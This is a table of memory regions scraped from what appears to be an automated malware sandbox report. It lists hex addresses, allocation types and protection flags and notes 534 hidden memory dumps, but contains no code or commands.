4A30000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B7C000
|
stack
|
page read and write
|
||
|
3048000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
300D000
|
stack
|
page read and write
|
||
|
4A65000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A3000
|
unkown
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
8CA0000
|
trusted library allocation
|
page read and write
|
||
|
22AB0000
|
heap
|
page read and write
|
||
|
30AF000
|
heap
|
page read and write
|
||
|
9B5000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
25090000
|
trusted library allocation
|
page read and write
|
||
|
250A0000
|
trusted library allocation
|
page read and write
|
||
|
ABF000
|
stack
|
page read and write
|
||
|
250A7000
|
trusted library allocation
|
page read and write
|
||
|
2600000
|
heap
|
page read and write
|
||
|
B2F000
|
heap
|
page read and write
|
||
|
24E34000
|
trusted library allocation
|
page read and write
|
||
|
24E33000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
372000
|
trusted library allocation
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
7F6B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
60B1000
|
trusted library allocation
|
page read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
22B40000
|
trusted library allocation
|
page read and write
|
||
|
24E1C000
|
stack
|
page read and write
|
||
|
9340000
|
trusted library allocation
|
page execute and read and write
|
||
|
893D000
|
heap
|
page read and write
|
||
|
787000
|
unkown
|
page read and write
|
||
|
7B3000
|
unkown
|
page readonly
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
8A1C000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
2609000
|
heap
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
25060000
|
trusted library allocation
|
page read and write
|
||
|
A80C000
|
direct allocation
|
page execute and read and write
|
||
|
4FDF000
|
stack
|
page read and write
|
||
|
728000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
7607000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
8CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CE0000
|
heap
|
page read and write
|
||
|
228DE000
|
stack
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E98000
|
stack
|
page read and write
|
||
|
24D3E000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
25410000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
73D0000
|
direct allocation
|
page read and write
|
||
|
25070000
|
trusted library allocation
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
22C90000
|
trusted library allocation
|
page read and write
|
||
|
24D84000
|
heap
|
page read and write
|
||
|
8CB0000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
776000
|
heap
|
page read and write
|
||
|
24FA1000
|
trusted library allocation
|
page read and write
|
||
|
7360000
|
direct allocation
|
page read and write
|
||
|
511D000
|
stack
|
page read and write
|
||
|
22CA0000
|
trusted library allocation
|
page read and write
|
||
|
7400000
|
heap
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
22940000
|
remote allocation
|
page read and write
|
||
|
8939000
|
heap
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
886B000
|
trusted library allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
8FE000
|
stack
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
8A33000
|
heap
|
page read and write
|
||
|
8941000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
31C0000
|
trusted library allocation
|
page read and write
|
||
|
23D09000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
30FB000
|
heap
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
35D000
|
trusted library allocation
|
page execute and read and write
|
There are 534 hidden memdumps, click here to show them.